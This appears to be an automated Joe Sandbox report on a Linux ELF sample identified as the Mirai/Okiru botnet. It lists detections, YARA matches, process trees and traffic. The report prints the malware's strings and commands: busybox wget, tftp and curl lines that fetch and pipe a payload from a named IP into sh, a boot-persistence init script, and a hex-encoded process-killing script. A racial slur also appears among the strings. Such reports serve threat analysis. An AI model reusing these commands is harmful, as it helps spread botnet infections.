Linux Analysis Report
x86_64.nn.elf

Overview

General Information

Sample name:x86_64.nn.elf
Analysis ID:1574207
MD5:adf6b23cac984a3a3904655c9b93e95d
SHA1:6b3eb5ca916435b936af388d0455cc67d40c8ef8
SHA256:22edd9ca7bb64abffb6ff297dafad627e552a8922c3c442ae81643e828fb0dfe
Tags:elf, user-abuse_ch

Detection

Mirai, Okiru
Score:100
Range:0 - 100
Whitelisted:false

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Mirai
Yara detected Okiru
Drops files in suspicious directories
Machine Learning detection for sample
Sample deletes itself
Sample tries to persist itself using /etc/profile
Sample tries to persist itself using System V runlevels
Sample tries to set files in /etc globally writable
Detected TCP or UDP traffic on non-standard ports
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "mkdir" command used to create folders
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Writes shell script file to disk with an unusual file extension
Yara signature match

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1574207
Start date and time:2024-12-13 04:22:06 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 59s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:x86_64.nn.elf
Detection:MAL
Classification:mal100.spre.troj.evad.linELF@0/9@0/0
Command:/tmp/x86_64.nn.elf
PID:6255
Exit Code:139
Exit Code Info:SIGSEGV (11) Segmentation fault invalid memory reference
Killed:False
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • x86_64.nn.elf (PID: 6255, Parent: 6179, MD5: adf6b23cac984a3a3904655c9b93e95d) Arguments: /tmp/x86_64.nn.elf
    • sh (PID: 6272, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"
      • sh New Fork (PID: 6278, Parent: 6272)
      • systemctl (PID: 6278, Parent: 6272, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service
    • sh (PID: 6304, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
      • sh New Fork (PID: 6306, Parent: 6304)
      • chmod (PID: 6306, Parent: 6304, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system
    • sh (PID: 6307, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
      • sh New Fork (PID: 6308, Parent: 6307)
      • ln (PID: 6308, Parent: 6307, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system
    • sh (PID: 6309, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
    • sh (PID: 6310, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
      • sh New Fork (PID: 6311, Parent: 6310)
      • chmod (PID: 6311, Parent: 6310, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh
    • sh (PID: 6312, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
      • sh New Fork (PID: 6313, Parent: 6312)
      • mkdir (PID: 6313, Parent: 6312, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d
    • sh (PID: 6314, Parent: 6255, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
      • sh New Fork (PID: 6315, Parent: 6314)
      • ln (PID: 6315, Parent: 6314, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh /etc/rc.d/S99sh
  • udisksd New Fork (PID: 6265, Parent: 799)
  • dumpe2fs (PID: 6265, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • systemd New Fork (PID: 6291, Parent: 6290)
  • snapd-env-generator (PID: 6291, Parent: 6290, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • udisksd New Fork (PID: 6329, Parent: 799)
  • dumpe2fs (PID: 6329, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6405, Parent: 799)
  • dumpe2fs (PID: 6405, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6425, Parent: 799)
  • dumpe2fs (PID: 6425, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6426, Parent: 799)
  • dumpe2fs (PID: 6426, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6428, Parent: 799)
  • dumpe2fs (PID: 6428, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6429, Parent: 799)
  • dumpe2fs (PID: 6429, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6430, Parent: 799)
  • dumpe2fs (PID: 6430, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • udisksd New Fork (PID: 6431, Parent: 799)
  • dumpe2fs (PID: 6431, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0
  • cleanup
Name: Mirai
Description: Mirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
Source: x86_64.nn.elf; Rule: JoeSecurity_Okiru; Description: Yara detected Okiru; Author: Joe Security
Source: x86_64.nn.elf; Rule: JoeSecurity_Mirai_8; Description: Yara detected Mirai; Author: Joe Security
Source: x86_64.nn.elf; Rule: Linux_Trojan_Gafgyt_9e9530a7; Description: unknown; Author: unknown
  • 0x105a4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
Source: x86_64.nn.elf; Rule: Linux_Trojan_Gafgyt_807911a2; Description: unknown; Author: unknown
  • 0x10d93:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
Source: x86_64.nn.elf; Rule: Linux_Trojan_Gafgyt_d4227dbf; Description: unknown; Author: unknown
  • 0xcd9e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0xd05c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp; Rule: JoeSecurity_Okiru; Description: Yara detected Okiru; Author: Joe Security
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp; Rule: JoeSecurity_Mirai_8; Description: Yara detected Mirai; Author: Joe Security
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp; Rule: Linux_Trojan_Gafgyt_9e9530a7; Description: unknown; Author: unknown
  • 0x105a4:$a: F6 48 63 FF B8 36 00 00 00 0F 05 48 3D 00 F0 FF FF 48 89 C3
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp; Rule: Linux_Trojan_Gafgyt_807911a2; Description: unknown; Author: unknown
  • 0x10d93:$a: FE 48 39 F3 0F 94 C2 48 83 F9 FF 0F 94 C0 84 D0 74 16 4B 8D
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp; Rule: Linux_Trojan_Gafgyt_d4227dbf; Description: unknown; Author: unknown
  • 0xcd9e:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
  • 0xd05c:$a: FF 48 81 EC D0 00 00 00 48 8D 84 24 E0 00 00 00 48 89 54 24 30 C7 04 24 18 00
          No Suricata rule has matched

          AV Detection

Source: x86_64.nn.elf; Avira: detected
Source: x86_64.nn.elf; Virustotal: Detection: 39%
Source: x86_64.nn.elf; ReversingLabs: Detection: 42%
Source: x86_64.nn.elf; Joe Sandbox ML: detected
          Source: x86_64.nn.elfString: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpythoniptablesnanonvimgdbpkillkillallapt/bin/loginFound And Killed Process: PID=%d, Realpath=%s/snap/snapd/15534/usr/lib/snapd/snapd/usr/libexec/openssh/sftp-serveranko-app/ankosample _8182T_110494.156.227.234mallocwaitpid/etc/motd%s
          Source: x86_64.nn.elfString: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7D\x22\x20\x5D""\x3B\x20\x74\x68\x65\x6E\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x6B\x69\x6C\x6C\x20\x2D\x39\x20\x22\x24\x70\x69\x64\x22\x0A\x20\x20""\x20\x20\x66\x69\x0A\x64\x6F\x6E\x65\x0A"
Source: global traffic; TCP traffic: 192.168.2.23:60018 -> 94.156.227.234:38242
Source: global traffic; TCP traffic: 192.168.2.23:39008 -> 154.216.19.139:199
Source: /tmp/x86_64.nn.elf (PID: 6255); Socket: 0.0.0.0:38242
Source: global traffic; TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic; TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
Source: global traffic; TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: x86_64.nn.elf, sh.32.dr, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, custom.service.12.dr; String found in binary or memory: http://94.156.227.233/
Source: x86_64.nn.elf; String found in binary or memory: http://94.156.227.233/curl.sh
Source: x86_64.nn.elf; String found in binary or memory: http://94.156.227.233/lol.sh
Source: x86_64.nn.elf; String found in binary or memory: http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s
Source: unknown; Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 42836 -> 443

          System Summary

Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Mirai_e0cf29e2; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Mirai_e0cf29e2; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 6255.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Mirai_e0cf29e2; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 6326.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Mirai_e0cf29e2; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 6318.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Mirai_e0cf29e2; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d4227dbf; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_d996d335; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_620087b9; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_33b4111a; Author: unknown
Source: 6327.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Mirai_e0cf29e2; Author: unknown
Source: Initial sample; String containing 'busybox' found: /bin/busybox
          Source: Initial sampleString containing 'busybox' found: getinfo xxxNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe..%s/%s/proc//data/local/tmp//var/run/home/usr/bin/dev/dev/mnt/var/tmpsize=10Mtmpfs/tmp/tt/tmp/tt/system/proc/%d/proc/proc/%u/statusPPid:/proc/%u/cmdline-bash-sh/bin/sh487154914<146<2surf2/proc/%d/exe/ /.socket/proc/%d/mountinfo/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/opt/app/monitor/z/secom//usr/lib/sys/media/srv/sbin/httpdtelnetddropbearencoder/var/tmp/wlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nn/initvar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdvar/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdhome/Davincissh/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/wgetcurlping/pswiresharktcpdumpnetstatpyth
Source: Initial sample; String containing 'busybox' found: usage: busybox
Source: Initial sample; String containing 'busybox' found: /bin/busybox hostname PBOC
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo >
Source: Initial sample; String containing 'busybox' found: /bin/busybox echo -ne
Source: Initial sample; String containing 'busybox' found: /bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;
Source: Initial sample; String containing 'busybox' found: /bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;
Source: Initial sample; String containing 'busybox' found: /bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;
Source: Initial sample; String containing 'busybox' found: /bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep
          Source: Initial sampleString containing 'busybox' found: incorrectinvalidbadwrongfaildeniederrorretryenablelinuxshellping ;shusage: busybox/bin/busybox hostname PBOC/bin/busybox echo > .b && sh .b && cd /bin/busybox echo -ne >> >sh .k94.156.227.233GET /dlr. HTTP/1.0
          Source: Initial sampleString containing 'busybox' found: .dThe Gorilla/var//var/run//var/tmp//dev//dev/shm//etc//mnt//boot//home/armarm5arm6arm7mipsmpslppcspcsh4/bin/busybox wget http://94.156.227.233/lol.sh -O- | sh;/bin/busybox tftp -g http://94.156.227.233/ -r lol.sh -l- | sh;/bin/busybox ftpget http://94.156.227.233/ lol.sh lol.sh && sh lol.sh;curl http://94.156.227.233/curl.sh -o- | sh/bin/busybox chmod +x .d; ./.d; ./dvrHelper selfrep"\x23\x21\x2F\x62\x69\x6E\x2F\x73\x68\x0A\x0A\x66\x6F\x72\x20\x70\x72\x6F\x63\x5F\x64\x69\x72\x20\x69\x6E\x20\x2F\x70\x72\x6F\x63""\x2F\x2A\x3B\x20\x64\x6F\x0A\x20\x20\x20\x20\x70\x69\x64\x3D\x24\x7B\x70\x72\x6F\x63\x5F\x64\x69\x72\x23\x23\x2A\x2F\x7D\x0A\x0A""\x20\x20\x20\x20\x72\x65\x73\x75\x6C\x74\x3D\x24\x28\x6C\x73\x20\x2D\x6C\x20\x22\x2F\x70\x72\x6F\x63\x2F\x24\x70\x69\x64\x2F\x65""\x78\x65\x22\x20\x32\x3E\x20\x2F\x64\x65\x76\x2F\x6E\x75\x6C\x6C\x29\x0A\x0A\x20\x20\x20\x20\x69\x66\x20\x5B\x20\x22\x24\x72\x65""\x73\x75\x6C\x74\x22\x20\x21\x3D\x20\x22\x24\x7B\x72\x65\x73\x75\x6C\x74\x25\x28\x64\x65\x6C\x65\x74\x65\x64\x29\x7
Source: ELF static info symbol of initial sample; .symtab present: no
Source: /tmp/x86_64.nn.elf (PID: 6326); SIGKILL sent: pid: 6316, result: successful
Source: /tmp/x86_64.nn.elf (PID: 6327); SIGKILL sent: pid: 788, result: successful
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_d4227dbf reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 58c4b1d4d167876b64cfa10f609911a80284180e4db093917fea16fae8ccd4e3, id = d4227dbf-6ab4-4637-a6ba-0e604acaafb4, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_d996d335 reference_sample = b511eacd4b44744c8cf82d1b4a9bc6f1022fe6be7c5d17356b171f727ddc6eda, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = e9ccb8412f32187c309b0e9afcc3a6da21ad2f1ffa251c27f9f720ccb284e3ac, id = d996d335-e049-4052-bf36-6cd07c911a8b, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_620087b9 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 06cd7e6eb62352ec2ccb9ed48e58c0583c02fefd137cd048d053ab30b5330307, id = 620087b9-c87d-4752-89e8-ca1c16486b28, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
Source: x86_64.nn.elf, type: SAMPLE; Matched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_9e9530a7 reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = d6ad6512051e87c8c35dc168d82edd071b122d026dce21d39b9782b3d6a01e50, id = 9e9530a7-ad4d-4a44-b764-437b7621052f, last_modified = 2021-09-16
Source: 6316.1.0000000000400000.0000000000418000.r-x.sdmp, type: MEMORY; Matched rule: Linux_Trojan_Gafgyt_807911a2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = f409037091b7372f5a42bbe437316bd11c655e7a5fe1fcf83d1981cb5c4a389f, id = 807911a2-f6ec-4e65-924f-61cb065dafc6, last_modified = 2021-09-16
